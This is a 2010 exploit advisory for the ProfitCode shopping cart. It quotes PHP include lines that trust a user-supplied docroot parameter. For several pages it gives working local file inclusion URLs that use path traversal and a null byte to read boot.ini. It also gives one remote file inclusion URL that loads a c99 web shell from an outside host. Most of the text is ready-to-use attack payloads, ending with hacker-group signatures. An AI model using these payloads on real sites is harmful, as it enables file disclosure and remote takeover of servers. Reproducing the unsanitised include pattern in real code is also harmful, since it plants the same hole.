# Exploit Title: ProfitCode Shopping Cart Multi Vulnerability (LFI/RFI)
# Date: 2010-01-09
# Author: Zer0 Thunder
# Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/
# Software Link: http://sourceforge.net/project/platformdownload.php?group_id=258424
# Tested on: Windows XP sp2 [WampServer 2.0i] 

- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 $returlvar = "dloads";
    include "$docroot" . "tplates/usrauthlogin.php";
    exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Exploit :
http://localhost/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]

Sample : 
http://localhost/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00

***************************************************************************************************

vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://localhost/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]

Sample
http://localhost/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00


Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://localhost/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]

Sample 
http://localhost/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00


************************************************************************

- For Some resons this comeup with a RFI 

Vuln c0de :	dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exploit 
http://localhost/store/dloads/dloads-header.php?docroot=[RFI]

Sample 
http://localhost/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00


########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################